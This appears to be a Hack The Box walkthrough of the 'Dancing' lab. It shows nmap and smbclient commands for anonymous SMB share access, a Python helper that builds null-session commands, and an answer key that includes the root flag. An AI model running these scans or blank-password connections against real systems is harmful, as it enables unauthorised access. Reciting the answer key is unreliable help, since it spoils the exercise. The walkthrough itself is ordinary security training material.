Dancing - Hack The Box

Introduction

On this machine we take advantage of a share misconfiguration in the SMB service: one share can be read with a blank password, without any credentials.

Reconnaissance

  • Connectivity: confirm the host answers a single ICMP echo request
    ping -c1 10.129.77.89
  • Nmap: SYN scan of every TCP port, reporting only open ones (run as root, -sS needs raw sockets)
    nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.129.77.89
    (-sS SYN scan, --open show only open ports, -p- all 65535 ports, --min-rate 5000 send at least 5000 packets per second, -vvv very verbose, -n no DNS resolution, -Pn skip host discovery and treat the host as up)
  • See available shares with smbclient (-L lists the shares, -N sends no password)
    smbclient -L 10.129.77.89 -N

Exploitation

  • Connect to the WorkShares share with a blank password (null session); inside the SMB shell, ls lists the files and get downloads them
    smbclient //10.129.77.89/WorkShares -N
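The share-listing step above produces a text table, and the exploitation step tries the non-default share with a blank password. The following Python script is added here as an example and is not part of the original writeup: it parses a constructed sample of `smbclient -L` output (the host address 10.129.77.89, the share count of four and the WorkShares name come from this page; the other three share names, the comment column and the trailing SMB1 lines are assumed typical Windows output), counts the shares, separates the Windows default shares (names ending in `$`) from user-created ones, and builds the null-session command line for each candidate without executing anything.

```python
import re

# Constructed sample of `smbclient -L 10.129.77.89 -N` output.
# It was NOT captured from the box: ADMIN$, C$ and IPC$ are assumed Windows
# defaults, WorkShares is the share named on this page. Real output is tab-indented.
SAMPLE_LISTING = """\

\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tWorkShares      Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
"""


def parse_share_listing(text):
    """Return a list of (name, type, comment) tuples from smbclient -L output.

    The share table starts at the 'Sharename' header and ends at the first
    blank or non-indented line; the dashed separator row is skipped.
    """
    shares = []
    in_table = False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("Sharename"):
            in_table = True
            continue
        if not in_table:
            continue
        if stripped.startswith("---"):
            continue
        if not stripped or not line.startswith(("\t", " ")):
            break  # end of the share table
        # columns are separated by runs of two or more spaces; the comment may be empty
        parts = re.split(r"\s{2,}", stripped, maxsplit=2)
        name = parts[0]
        share_type = parts[1] if len(parts) > 1 else ""
        comment = parts[2] if len(parts) > 2 else ""
        shares.append((name, share_type, comment))
    return shares


def candidate_shares(shares):
    """Names of user-created disk shares (not ending in $).

    ADMIN$, C$ and IPC$ are Windows defaults that require a privileged account;
    user-created shares such as WorkShares are where misconfigured permissions
    usually live, so they are the ones to check for blank-password access.
    """
    return [name for name, share_type, _ in shares
            if not name.endswith("$") and share_type == "Disk"]


def access_commands(host, shares):
    """Build (but do not run) the smbclient null-session command for each candidate share."""
    return [f"smbclient //{host}/{name} -N" for name in candidate_shares(shares)]


if __name__ == "__main__":
    found = parse_share_listing(SAMPLE_LISTING)
    print(f"{len(found)} shares listed")
    for share in found:
        print("  ", share)
    for cmd in access_commands("10.129.77.89", found):
        print("check with:", cmd)
```

Run against real output with `smbclient -L <host> -N | python3 audit_shares.py` after replacing SAMPLE_LISTING with `sys.stdin.read()`; the script answers tasks 5 and 6 directly (four shares, WorkShares as the only non-default one) and prints the exact command used in the Exploitation step.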

Task

  1. What does the 3-letter acronym SMB stand for?

    server message block

  2. What port does SMB use to operate at?

    445

  3. What is the service name for port 445 that came up in our Nmap scan?

    microsoft-ds

  4. What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ‘list’ the available shares on Dancing?

    -L

  5. How many shares are there on Dancing?

    4

  6. What is the name of the share we are able to access in the end with a blank password?

    WorkShares

  7. What is the command we can use within the SMB shell to download the files we find?

    get

  8. Submit root flag

    5f61c10dffbc77a704d76016a22f1664